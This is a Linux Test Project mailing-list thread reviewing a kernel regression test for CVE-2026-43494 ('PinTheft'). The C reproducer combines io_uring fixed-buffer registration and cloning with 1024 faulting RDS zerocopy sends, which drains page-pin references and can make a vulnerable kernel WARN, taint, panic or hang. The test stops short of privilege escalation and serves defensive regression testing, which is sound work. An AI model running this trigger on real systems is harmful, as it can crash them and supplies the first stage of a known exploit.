> + return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
> + &clone, 1);
> +}
> +
> +static void setup(void)
> +{
> + struct io_uring_params params = {};
> + struct iovec fixed_iov;
> + int val;
> +
> + page_size = SAFE_SYSCONF(_SC_PAGESIZE);
> + io_uring_setup_supported_by_kernel();
> +
> + /*
> + * The exploit primitive keeps one fixed-buffer registration alive and
> + * clones it to another ring.
> + */
> + ring_fd1 = io_uring_setup(1, ¶ms);
> + if (ring_fd1 < 0)
> + tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
> +
> + memset(¶ms, 0, sizeof(params));
> +
> + ring_fd2 = io_uring_setup(1, ¶ms);
> + if (ring_fd2 < 0)
> + tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
> +
> + rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
> + if (rds_fd < 0) {
> + if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
> + errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
> + tst_brk(TCONF | TERRNO, "RDS is not available");
EAFNOSUPPORT should be sufficient availability check.
> +
> + tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
> + }
> +
> + /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
> + val = RDS_TRANS_TCP;
> + TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
> +
> + if (TST_RET) {
> + if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
> + tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
> +
> + tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
> + }
> +
> + /*
> + * Allocate two adjacent pages: the first one will be pinned as an
> + * io_uring fixed buffer, and the second one will be made inaccessible.
> + */
> + mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
> + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
> + memset(mapped_pages, 0xa5, page_size);
> +
> + /*
> + * RDS should successfully pin the first page, then fault on the second.
> + * That fault drives the buggy zerocopy error cleanup path.
> + */
> + SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
> +
> + fixed_iov.iov_base = mapped_pages;
> + fixed_iov.iov_len = page_size;
> +
> + /*
> + * Register only the first page as an io_uring fixed buffer. This creates
> + * the long-term page pin whose reference accounting the RDS bug damages.
> + */
> + if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
> + tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
> +
> + buffer_registered = 1;
> +
> + /*
> + * Clone the fixed buffer registration into the second ring, matching the
> + * public reproducer's lifetime pattern without performing the later
> + * page-cache overwrite stage.
> + */
> + if (clone_buffers(ring_fd2, ring_fd1)) {
> + if (errno == EINVAL || errno == EOPNOTSUPP)
> + tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
> +
> + tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
> + }
> +
> + buffer_cloned = 1;
> +}
> +
> +static void trigger(void)
> +{
> + /*
> + * Derive RDS ports from the process ID so concurrent test instances
> + * do not collide in the RDS port namespace.
> + */
> + const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
> + struct sockaddr_in bind_addr = {
> + .sin_family = AF_INET,
> + .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
> + .sin_port = htons(src_port),
> + };
> + struct sockaddr_in dst_addr = {
> + .sin_family = AF_INET,
> + .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
> + .sin_port = htons(src_port + 1),
> + };
> + char control[CMSG_SPACE(sizeof(uint32_t))];
> + struct cmsghdr *cmsg;
> + struct iovec iov = {
> + .iov_base = mapped_pages,
> + .iov_len = 2 * page_size,
> + };
> + struct msghdr msg = {
> + .msg_name = &dst_addr,
> + .msg_namelen = sizeof(dst_addr),
> + .msg_iov = &iov,
> + .msg_iovlen = 1,
> + .msg_control = control,
> + .msg_controllen = sizeof(control),
> + };
> + int ret;
> + int val;
> + int i, efaults, first_bad_errno = 0;
> +
> + /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
> + val = 1;
> + if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
> + if (errno == ENOPROTOOPT || errno == EINVAL)
> + tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
> + tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
> + }
> +
> + val = 2 * page_size * 4;
> + SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
> +
> + /*
> + * Bind to one loopback RDS port and send to another unbound local port.
> + * The sends are expected to fail before any useful delivery; the faulting
> + * iovec is the interesting part.
> + */
> + SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
I'm not sure if RDS bind() works the same as other protocols but you
should be able to bind to port 0 (autoassign) and then read src_port
using TST_GETSOCKPORT(rds_fd).
> +
> + memset(control, 0, sizeof(control));
> + cmsg = (struct cmsghdr *)control;
> + cmsg->cmsg_level = SOL_RDS;
> + cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
> + cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
> +
> + /*
> + * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
> + * and page 1 is PROT_NONE. Each attempt should:
> + * 1. Pin page 0 successfully.
> + * 2. Fault on page 1, so RDS error path drops page 0's reference.
> + * 3. RDS message cleanup drops page 0's reference again (the bug).
> + *
> + * On a vulnerable kernel this steals one FOLL_PIN reference per
> + * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
> + * Unregistering the io_uring fixed buffer then tries to unpin a page
> + * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
> + * and taint.
> + *
> + * EFAULT is the expected error because page 1 is PROT_NONE. Other
> + * errors do not count as successful pin-theft iterations.
> + *
> + * Vulnerable kernels may crash, taint, panic, or hang here or during
> + * cleanup() below.
> + */
> + for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
> + /* rds_cmsg_zcopy() in net/rds/send.c */
> + *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
> +
> + ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
> + if (ret >= 0)
> + tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
> +
> + if (errno == EFAULT)
> + efaults++;
> + else if (!first_bad_errno)
> + first_bad_errno = errno;
> + }
> +
> + if (first_bad_errno) {
> + tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
> + first_bad_errno, tst_strerrno(first_bad_errno));
> + }
> +
> + tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
> + efaults, GUP_PIN_COUNTING_BIAS);
> +
> + if (efaults == 0)
> + tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
> +
> + if (efaults < GUP_PIN_COUNTING_BIAS)
> + tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
> + efaults, GUP_PIN_COUNTING_BIAS);
> +
> + /*
> + * Unregistering fixed buffers on a vulnerable kernel triggers a
> + * double-unpin: io_uring tries to release references that the RDS bug
> + * already dropped, which may produce a kernel WARN or BUG_ON and taint.
> + */
> + cleanup();
You should not call cleanup() directly. You'll destroy resources
allocated in setup() and the test will then fail on fixed kernels if
your run it with -i 2.
> +}
> +
> +static void poke_rss_accounting(void)
> +{
> + char *mem;
> +
> + mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
> + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
> + memset(mem, 0x5a, RSS_CHECK_SIZE);
> + SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
> +}
> +
> +static void run(void)
> +{
> + pid_t pid;
> + int status;
> + int i;
> +
> + /*
> + * Run the dangerous part in a child so that process teardown can expose
> + * delayed RSS/page-accounting damage before the parent reports TPASS.
> + */
> + pid = SAFE_FORK();
> + if (!pid) {
> + trigger();
> + exit(0);
> + }
> +
> + SAFE_WAITPID(pid, &status, 0);
> + if (!WIFEXITED(status) || WEXITSTATUS(status))
> + return;
You can do tst_reap_children() instead. There's no need to exit early if
any child fails.
> +
> + /*
> + * The visible failure can be delayed until another mm is torn down.
> + * Create short-lived children that dirty and release anonymous memory to
> + * encourage RSS accounting checks before the parent reports success.
> + */
> + for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
> + pid = SAFE_FORK();
> + if (!pid) {
> + poke_rss_accounting();
> + exit(0);
> + }
> +
> + SAFE_WAITPID(pid, &status, 0);
Why not only fork() in the loop, let all children run in parallel, and
then reap + check taint after the loop?
> +
> + if (tst_taint_check()) {
> + tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
> + return;
> + }
> +
> + if (!WIFEXITED(status) || WEXITSTATUS(status))
> + return;
> + }
> +
> + /*
> + * RDS/page cleanup can run asynchronously after userspace returns from
> + * sendmsg() and after file descriptors are closed. Wait before declaring
> + * that the kernel merely "seems" to have survived.
> + */
> + for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
> + sleep(1);
> +
> + if (tst_taint_check()) {
> + tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
> + return;
> + }
> + }
> +
> + tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
> +}
> +
> +static void cleanup(void)
> +{
> + /*
> + * Unregister the clone first, then the source registration.
> + * Order matters: on a vulnerable kernel, unregistering ring_fd1
> + * (the original) after the FOLL_PIN references have been drained
> + * is what triggers the double-unpin WARN/BUG_ON.
> + */
> + if (buffer_cloned) {
> + io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
> + buffer_cloned = 0;
> + }
> +
> + if (buffer_registered) {
> + io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
> + buffer_registered = 0;
> + }
I think you could make the unregister calls together with closing the
relevant ring_fd. You don't need to keep special flags what was registered.
> +
> + if (ring_fd2 >= 0) {
> + SAFE_CLOSE(ring_fd2);
> + ring_fd2 = -1;
SAFE_CLOSE() sets the file descriptor to -1 automatically. Ignore any AI
comments to the contrary.
> + }
> +
> + if (ring_fd1 >= 0) {
> + SAFE_CLOSE(ring_fd1);
> + ring_fd1 = -1;
> + }
> +
> + if (rds_fd >= 0) {
> + SAFE_CLOSE(rds_fd);
> + rds_fd = -1;
> + }
> +
> + if (mapped_pages) {
> + SAFE_MUNMAP(mapped_pages, 2 * page_size);
> + mapped_pages = NULL;
> + }
> +}
> +
> +static struct tst_test test = {
> + .test_all = run,
> + .setup = setup,
> + .cleanup = cleanup,
> + .timeout = 60,
> + .forks_child = 1,
> + .taint_check = TST_TAINT_W | TST_TAINT_D,
> + .needs_kconfigs = (const char *[]) {
> + "CONFIG_RDS",
> + "CONFIG_RDS_TCP",
> + "CONFIG_IO_URING",
> + NULL
> + },
> + .save_restore = (const struct tst_path_val[]) {
> + {"/proc/sys/kernel/io_uring_disabled", "0",
> + TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
> + {}
> + },
> + .tags = (const struct tst_tag[]) {
> + {"linux-git", "e17492979319"},
> + {"CVE", "2026-43494"},
> + {}
> + }
> +};
--
Martin Doucha mdoucha@suse.cz
SW Quality Engineer
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-24 18:16 ` [LTP] [PATCH v4] " Petr Vorel
@ 2026-05-28 16:45 ` Martin Doucha
2026-05-28 21:31 ` Petr Vorel
0 siblings, 1 reply; 19+ messages in thread
From: Martin Doucha @ 2026-05-28 16:45 UTC (permalink / raw)
To: Petr Vorel, Sebastian Chlad; +Cc: Sebastian Chlad, ltp
Hi!
On 5/24/26 20:16, Petr Vorel wrote:
>> + rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
>> + if (rds_fd < 0) {
>> + if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
>> + errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
>> + tst_brk(TCONF | TERRNO, "RDS is not available");
>> +
>> + tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
>
> Just a quick Sunday evening comment (not yet looking into the reproducer itself).
> I wonder if we need this complicated check when we already have kconfig based
> checks at the end. Could we just simply use SAFE_SOCKET() here? Or have you
> encountered problems with older kernels?
I've checked, SAFE_SOCKET() will fail on kernel-default-base due to the
usual kconfig-RPM mismatch.
>> + if (clone_buffers(ring_fd2, ring_fd1)) {
>> + if (errno == EINVAL || errno == EOPNOTSUPP)
>> + tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
> Also here do we need it? IMHO CONFIG_IO_URING should be enough.
> And if errno is really needed, it'd IMHO be better to be in handled in
> clone_buffers(), not separately.
IORING_REGISTER_CLONE_BUFFERS was added in kernel v6.12 so the feature
check is also needed.
--
Martin Doucha mdoucha@suse.cz
SW Quality Engineer
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-28 16:45 ` Martin Doucha
@ 2026-05-28 21:31 ` Petr Vorel
0 siblings, 0 replies; 19+ messages in thread
From: Petr Vorel @ 2026-05-28 21:31 UTC (permalink / raw)
To: Martin Doucha; +Cc: ltp, Sebastian Chlad
Hi Martin,
> Hi!
> On 5/24/26 20:16, Petr Vorel wrote:
> > > + rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
> > > + if (rds_fd < 0) {
> > > + if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
> > > + errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
> > > + tst_brk(TCONF | TERRNO, "RDS is not available");
> > > +
> > > + tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
> > Just a quick Sunday evening comment (not yet looking into the reproducer itself).
> > I wonder if we need this complicated check when we already have kconfig based
> > checks at the end. Could we just simply use SAFE_SOCKET() here? Or have you
> > encountered problems with older kernels?
> I've checked, SAFE_SOCKET() will fail on kernel-default-base due to the
> usual kconfig-RPM mismatch.
Thanks for info! There will be more modules like this [*]. I also wonder if
SAFE_SOCKET() should not change to TCONF on these errnos, we do that already for
some safe functions (safe_io_uring_init(), safe_unshare(), safe_timerfd_*(). It
should be safe also in this case.
BTW isn't it that autoloading is not working? i.e. testing on some old machine
with Debian (i.e. not JeOS missing modules problem).
$ uname -r
6.18-amd64
# ./pintheft
...
pintheft.c:120: TCONF: RDS is not available: EAFNOSUPPORT (97)
=> module not autoloaded by socket() (or the other syscalls) => IMHO worth to
double check if it should be autoloaded and/or call "modprobe rds_tcp" in the test.
# modprobe rds
# ./pintheft
pintheft.c:337: TFAIL: Kernel is vulnerable: tainted during RSS accounting checks
tst_test.c:1928: TFAIL: Kernel is now tainted
=> loading manually it detects it
# rmmod rds_tcp
# rmmod rds
# ./pintheft
tst_kconfig.c:90: TINFO: Parsing kernel config '/boot/config-6.18-amd64'
tst_taint.c:85: TCONF: Ignoring already set kernel warning taint
...
pintheft.c:274: TINFO: Completed 1024/1024 sendmsg() attempts with EFAULT
pintheft.c:359: TPASS: Kernel seems to have survived RDS zerocopy cleanup
=> are we really safe now? Maybe yes, as rds is not autoloaded automatically.
> > > + if (clone_buffers(ring_fd2, ring_fd1)) {
> > > + if (errno == EINVAL || errno == EOPNOTSUPP)
> > > + tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
> > Also here do we need it? IMHO CONFIG_IO_URING should be enough.
> > And if errno is really needed, it'd IMHO be better to be in handled in
> > clone_buffers(), not separately.
> IORING_REGISTER_CLONE_BUFFERS was added in kernel v6.12 so the feature check
> is also needed.
Shouldn't the test require v6.12 then? Without it test TCONF anyway. Or you
expect being it backported? OTOH fix was backported to v6.6.141 (but IMHO test
is not able to test that old kernel).
$ uname -r
6.9.9-amd64
# ./pintheft
pintheft.c:120: TCONF: RDS is not available: EAFNOSUPPORT (97)
# modprobe rds
# ./pintheft
pintheft.c:169: TCONF: IORING_REGISTER_CLONE_BUFFERS is not supported: EINVAL (22)
$ uname -r
6.12.38+deb13-amd64
# ./pintheft
pintheft.c:120: TCONF: RDS is not available: EAFNOSUPPORT (97)
# modprobe rds
# ./pintheft
pintheft.c:337: TFAIL: Kernel is vulnerable: tainted during RSS accounting checks
tst_test.c:1928: TFAIL: Kernel is now tainted
# rmmod rds_tcp
# modprobe rds
# modprobe rds_tcp
tst_taint.c:85: TCONF: Ignoring already set kernel warning taint
pintheft.c:359: TPASS: Kernel seems to have survived RDS zerocopy cleanup
Kind regards,
Petr
[*] I.e. any module which cannot be detected via /proc/sys like check in
lib/tst_kconfig_checks.h; I was even thinking about checking via /proc/modules
or /sys/module/*/, but that would work only to double check if module
autoloading or direct loading with modprobe work. Maybe too complicated, but for
tests which call modprobe on some modules e.g. hwpoison_inject or zram it could
be useful.
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-25 9:36 ` Cyril Hrubis
@ 2026-05-29 10:18 ` Andrea Cervesato via ltp
2026-05-29 11:56 ` Cyril Hrubis
0 siblings, 1 reply; 19+ messages in thread
From: Andrea Cervesato via ltp @ 2026-05-29 10:18 UTC (permalink / raw)
To: Cyril Hrubis; +Cc: ltp, linuxtestproject.agent
Hi Cyril,
> This one is actually wrong. For historical reasons macros are indented
> with spaces after the hash.
You should add a rule because we are actually asking to respect kernel
styling and probably that's the reason why this is spotted by LLM.
regards,
--
Andrea Cervesato
SUSE QE Automation Engineer Linux
andrea.cervesato@suse.com
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-29 10:18 ` Andrea Cervesato via ltp
@ 2026-05-29 11:56 ` Cyril Hrubis
0 siblings, 0 replies; 19+ messages in thread
From: Cyril Hrubis @ 2026-05-29 11:56 UTC (permalink / raw)
To: Andrea Cervesato; +Cc: ltp, linuxtestproject.agent
Hi!
> > This one is actually wrong. For historical reasons macros are indented
> > with spaces after the hash.
>
> You should add a rule because we are actually asking to respect kernel
> styling and probably that's the reason why this is spotted by LLM.
AFAIK kernel follows the same style here but I do not see it mentioned
anywhere in kernel documentation. It's probably one of the rule everyone
follows without thinking about it.
I will add a pull for the ltp-agent.
--
Cyril Hrubis
chrubis@suse.cz
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks
2026-05-28 16:36 ` Martin Doucha
@ 2026-06-04 16:38 ` Sebastian Chlad
2026-06-04 16:38 ` [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test Sebastian Chlad
2026-06-04 18:00 ` [LTP] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks linuxtestproject.agent
0 siblings, 2 replies; 19+ messages in thread
From: Sebastian Chlad @ 2026-06-04 16:38 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Add IORING_REGISTER_CLONE_BUFFERS opcode and struct io_uring_clone_buffers
to lapi/io_uring.h for kernels/headers that predate the clone-buffers API.
Add lapi/rds.h with a fallback for RDS_CMSG_ZCOPY_COOKIE, which is absent
in older userspace headers (e.g. openSUSE Leap 42.2).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
configure.ac | 1 +
include/lapi/io_uring.h | 17 +++++++++++++++++
include/lapi/rds.h | 16 ++++++++++++++++
3 files changed, 34 insertions(+)
create mode 100644 include/lapi/rds.h
diff --git a/configure.ac b/configure.ac
index 0653d7793..3a1283ac3 100644
--- a/configure.ac
+++ b/configure.ac
@@ -255,6 +255,7 @@ AC_CHECK_TYPES([struct __kernel_old_timeval, struct __kernel_old_timespec, struc
struct __kernel_old_itimerval],,,[#include <sys/socket.h>])
AC_CHECK_TYPES([struct futex_waitv],,,[#include <linux/futex.h>])
+AC_CHECK_TYPES([struct io_uring_clone_buffers],,,[#include <linux/io_uring.h>])
AC_CHECK_TYPES([struct mount_attr],,,[
#ifdef HAVE_MOUNT_SETATTR
# include <sys/mount.h>
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..afc32c247 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,23 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+/* linux/io_uring.h: IORING_REGISTER_CLONE_BUFFERS = 30 */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+# define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
+/* Argument for IORING_REGISTER_CLONE_BUFFERS (linux/io_uring.h) */
+#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS
+struct io_uring_clone_buffers {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t src_off;
+ uint32_t dst_off;
+ uint32_t nr;
+ uint32_t pad[3];
+};
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/include/lapi/rds.h b/include/lapi/rds.h
new file mode 100644
index 000000000..7405a7f37
--- /dev/null
+++ b/include/lapi/rds.h
@@ -0,0 +1,16 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+#ifndef LAPI_RDS_H__
+#define LAPI_RDS_H__
+
+#include <linux/rds.h>
+
+/* Fallback for older userspace headers (e.g. openSUSE Leap 42.2). */
+#ifndef RDS_CMSG_ZCOPY_COOKIE
+# define RDS_CMSG_ZCOPY_COOKIE 12
+#endif
+
+#endif /* LAPI_RDS_H__ */
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test
2026-06-04 16:38 ` [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks Sebastian Chlad
@ 2026-06-04 16:38 ` Sebastian Chlad
2026-06-05 15:30 ` Martin Doucha
2026-06-04 18:00 ` [LTP] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks linuxtestproject.agent
1 sibling, 1 reply; 19+ messages in thread
From: Sebastian Chlad @ 2026-06-04 16:38 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
v5:
Changes from the review applied.
Notably:
- Split LAPI changes into a separate commit
- Rename pintheft.c to io_uring04.c
- Remove redundant headers already included by tst_test.h
- Move RDS_CMSG_ZCOPY_COOKIE fallback to new lapi/rds.h
- Reduce CLEANUP_WAIT_SECS from 30 to 10
- Use EAFNOSUPPORT as the sole RDS availability check
- Use port 0 + TST_GETSOCKPORT() instead of PID-derived port
- Don't call cleanup() from trigger(); move buffer unregistration to run()
- Use tst_reap_children() instead of SAFE_WAITPID and status check
- Fork all RSS children in parallel, check taint once after tst_reap_children()
- Remove buffer_registered/buffer_cloned flags; pair unregister with SAFE_CLOSE
- Remove manual fd = -1 after SAFE_CLOSE
runtest/cve | 1 +
runtest/syscalls | 1 +
.../kernel/syscalls/io_uring/io_uring04.c | 358 ++++++++++++++++++
3 files changed, 360 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/io_uring04.c
diff --git a/runtest/cve b/runtest/cve
index a5952b56c..cc664bb93 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -95,5 +95,6 @@ cve-2025-38236 cve-2025-38236
cve-2025-21756 cve-2025-21756
cve-2026-31431 af_alg08
cve-2026-43284 xfrm01
+cve-2026-43494 io_uring04
cve-2026-46300 xfrm02
cve-2026-46300-skb-segment xfrm03
diff --git a/runtest/syscalls b/runtest/syscalls
index f790e8f84..6b047b5fd 100644
--- a/runtest/syscalls
+++ b/runtest/syscalls
@@ -1904,6 +1904,7 @@ membarrier01 membarrier01
io_uring01 io_uring01
io_uring02 io_uring02
io_uring03 io_uring03
+io_uring04 io_uring04
# Tests below may cause kernel memory leak
perf_event_open03 perf_event_open03
diff --git a/testcases/kernel/syscalls/io_uring/io_uring04.c b/testcases/kernel/syscalls/io_uring/io_uring04.c
new file mode 100644
index 000000000..040f1bdf5
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/io_uring04.c
@@ -0,0 +1,358 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <stdint.h>
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/rds.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 10
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/* Matches mm/gup.c: FOLL_PIN adds this bias to the page refcount. */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static long page_size;
+static void *mapped_pages;
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct io_uring_clone_buffers clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring. The child runs the FOLL_PIN drain loop;
+ * run() unregisters the buffers afterwards to trigger the double-unpin
+ * WARN/BUG_ON on vulnerable kernels.
+ */
+ ring_fd1 = io_uring_setup(1, ¶ms);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(¶ms, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, ¶ms);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
